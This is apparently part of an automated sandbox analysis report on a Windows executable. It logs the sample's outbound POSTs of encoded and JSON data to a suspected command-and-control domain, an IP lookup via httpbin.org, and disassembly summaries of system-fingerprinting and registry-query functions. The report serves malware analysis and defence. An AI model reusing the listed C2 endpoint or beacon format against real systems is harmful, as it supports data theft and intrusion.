Dec 28, 2024 09:34:52.025655985 CET	2472	OUT	Data Raw: 69 57 34 2b 49 48 6a 54 52 50 69 4c 70 5c 2f 69 57 31 2b 48 33 67 33 77 4e 34 68 30 37 34 67 74 44 6f 71 61 4e 65 61 4a 71 5c 2f 68 7a 52 5c 2f 70 42 62 47 79 52 34 35 46 73 37 56 5a 49 67 46 69 6b 57 33 69 44 78 68 63 37 52 47 77 51 4d 67 47 54 Data Ascii: iW4+IHjTRPiLp\/iW1+H3g3wN4h074gtDoqaNeaJq\/hzR\/pBbGyR45Fs7VZIgFikW3iDxhc7RGwQMgGTgKQBk461Rn8PeH7qQzXOhaPcTN96WfTLKaRu\/LyQMx5J6nvX8wYr6F\/CqxMcZlHE+c5ZiI5xlWaJqNPEJQyzH5TnlTD2xHtaVaWZ8T5RQ4kzTF4yjisbisznXviY4StUwsv7Uw\/7QTjevluNyniDhDIM6weOyP
Dec 28, 2024 09:34:53.144731045 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	81.29.149.125	80	4028	C:\Users\user\Desktop\sYPORwmgwQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:34:53.987222910 CET	284	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 28, 2024 09:34:55.297974110 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	34.226.108.155	443	4028	C:\Users\user\Desktop\sYPORwmgwQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:48 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:34:49 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:49 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:34:49 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	03:34:44
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\sYPORwmgwQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\sYPORwmgwQ.exe"
Imagebase:	0x800000
File size:	4'464'640 bytes
MD5 hash:	095505C3A10C05A5301B5E4C34464AC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.5%
Total number of Nodes:	244
Total number of Limit Nodes:	36

Executed Functions

Function 0083F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s done, xrefs: 0083F9CD, 0083FD27, 0083FF03
ipv4, xrefs: 0083F331, 0083F34B, 0083F36C, 0083F3EC, 0083F5BB
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00840254
%s starting (timeout=%lldms), xrefs: 0083FCDD, 0083FEB1
%s assess started=%d, result=%d, xrefs: 00840150, 008401AE
created %s (timeout %lldms), xrefs: 0083F4BE, 0083F5DF
ipv6, xrefs: 0083F3DC
Connection timeout after %lld ms, xrefs: 008400AC
Connection time-out, xrefs: 0083F2A3
%s trying next, xrefs: 0083F8FE
Connected to %s (%s) port %u, xrefs: 00840026
all eyeballers failed, xrefs: 008400FF
%s connect -> %d, connected=%d, xrefs: 0083F720
%s connect timeout after %lldms, move on!, xrefs: 0083FA33
connect.c, xrefs: 0083F3BB, 0083F4FA

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: c0516258ac77c3373145e6104520fb52b001f17b9a499ae70485bb41163629f4
Instruction ID: b293d988148013efc43362eb3398ee9e8223785259f9ba526fb0ed3c87c427cb
Opcode Fuzzy Hash: c0516258ac77c3373145e6104520fb52b001f17b9a499ae70485bb41163629f4
Instruction Fuzzy Hash: 8EC29B31A047489FD724CF29C485B6AB7E1FF94318F058669EE98DB262D770E984CBC1

Function 0080255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00802579
GlobalMemoryStatusEx.KERNELBASE ref: 008025CC
GetDriveTypeA.KERNELBASE ref: 00802647
GetDiskFreeSpaceExA.KERNELBASE ref: 0080267E
KiUserCallbackDispatcher.NTDLL ref: 008027E2
FindFirstFileW.KERNELBASE ref: 008028F8
FindNextFileW.KERNELBASE ref: 0080291F

Strings

@, xrefs: 008025B4
`, xrefs: 008029BC

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: @$`
API String ID: 3271271169-3318628307
Opcode ID: a5aa7415d2a8f13b42cea6ffd38368770c88575286f09a0787d726ae2499587c
Instruction ID: c43629297c43cdfdf8e521330ef90833aba27933b3cf9b3ce59aabeb96b94071
Opcode Fuzzy Hash: a5aa7415d2a8f13b42cea6ffd38368770c88575286f09a0787d726ae2499587c
Instruction Fuzzy Hash: E3D1D5B49093189FCB10EF68C98569EBBF0FF84344F008869E899D7351E7749A84DF96

Function 008029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00802A27
RegOpenKeyExA.KERNELBASE ref: 00802A8A
CharUpperA.USER32 ref: 00802AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00802C26
CloseHandle.KERNELBASE ref: 00802C49
CloseHandle.KERNELBASE ref: 00802DFC

Strings

0, xrefs: 00802DA9

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: 652d237014724bfd8ed0f3fd17ad0a9edfd121d4e39d6ddfbec65f2dfdf80d65
Instruction ID: d0d440986518e9140ee6b280f4898f0ef90e57794efc6c155f52cdfc317048e9
Opcode Fuzzy Hash: 652d237014724bfd8ed0f3fd17ad0a9edfd121d4e39d6ddfbec65f2dfdf80d65
Instruction Fuzzy Hash: 4BE1D4B49093099FCB50EF68D98569EBBF4FF44304F5088AAE888D7350E7749988CF56

Function 008105B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00810712
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008109DD
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008109FB

Strings

multi.c, xrefs: 008107B2

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: multi.c
API String ID: 2170980988-214371023
Opcode ID: 7100ebde8c4b55f0cbfb547dee499f533c4de63d9b5691fc80c817082d45fa4e
Instruction ID: f31f75c4081daa3d1202765af7bbcdb7ca3c41d03553ab9ee64a5ed693ccc945
Opcode Fuzzy Hash: 7100ebde8c4b55f0cbfb547dee499f533c4de63d9b5691fc80c817082d45fa4e
Instruction Fuzzy Hash: A6D18A716083059BE7118F24CC81BABBBE9FF94348F04482CF895C6292E7B5E995CF52

Function 008CB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 008CB2B7

Strings

cur != NULL, xrefs: 008CB3F2
ares__sortaddrinfo.c, xrefs: 008CB3ED

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: ce62770aace3490094de7f9bfd7f80fb1d66be255a17fc5bb6062e9b4b522704
Instruction ID: aa48388a25f8748a6b5f66e6ad0ab85eb88ec310bd1459c6b6ca0554e3f2b12f
Opcode Fuzzy Hash: ce62770aace3490094de7f9bfd7f80fb1d66be255a17fc5bb6062e9b4b522704
Instruction Fuzzy Hash: 56C137716046059FD718DF28C882B6AB7F5FF88314F05896CE8899B3A2DB35ED45CB81

Function 00816FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3ba9abf5cd3882b08a17b9a272c17faa84999c4655d0b949687dcc55f752a3
Instruction ID: 9168d0861d20aabf19be111fec59dbdb4c17e4e79e990da464ac2052f866f77a
Opcode Fuzzy Hash: fe3ba9abf5cd3882b08a17b9a272c17faa84999c4655d0b949687dcc55f752a3
Instruction Fuzzy Hash: F791D03060C7499BD7359A2888847FB72EDFFC4364F648A2CE8A9831D4EB759D81D681

Function 008CA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,008B712E,?,?,?,00001001,00000000), ref: 008CA90D

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 110ccf06c9dfaf95427b43c7d8b707742c31eec57f4355ac55e1b76cfc8a91fd
Instruction ID: 564e0b8123f61f249e75b4bd04b291dd26fadf4d7b145f9de65066796529bf6e
Opcode Fuzzy Hash: 110ccf06c9dfaf95427b43c7d8b707742c31eec57f4355ac55e1b76cfc8a91fd
Instruction Fuzzy Hash: 52F0497510830CAFD2109A01DC89E6BBBFDFBC9758F05455DF958132118270AE148AB2

Function 008BA440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008BAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 008BAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAB30
RegCloseKey.KERNELBASE(?), ref: 008BAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 008BAB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 008BAC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 008BAD0A
RegEnumKeyExA.KERNELBASE ref: 008BAD8D
RegCloseKey.KERNELBASE(?), ref: 008BADD9
RegEnumKeyExA.KERNELBASE ref: 008BAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008BAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 008BB072

Strings

Software\Policies\Microsoft\System\DNSClient, xrefs: 008BAC3C
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 008BAD00
SearchList, xrefs: 008BAA46, 008BAA91, 008BABA7, 008BABEA, 008BAE4E, 008BAE9D
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 008BAB78
PrimaryDNSSuffix, xrefs: 008BAC6B, 008BACAE
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 008BAA0F
DhcpDomain, xrefs: 008BB06C, 008BB0BB
Domain, xrefs: 008BAAE3, 008BAB2A, 008BAF5D, 008BAFAC

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4281207131-1047472027
Opcode ID: c2f97b130cb58e0d942a6d7ebfc9b191efd2a6e3a892cc63ebf11f8c784a069f
Instruction ID: bb2e8403aeaab4a68e64a3341c4da27d6eac3bea445848fb6172e72e68f566ca
Opcode Fuzzy Hash: c2f97b130cb58e0d942a6d7ebfc9b191efd2a6e3a892cc63ebf11f8c784a069f
Instruction Fuzzy Hash: A9726BB1608341AFE3249B24DC81BAB7BE8FF85740F144828F985D72A1E775E945CB63

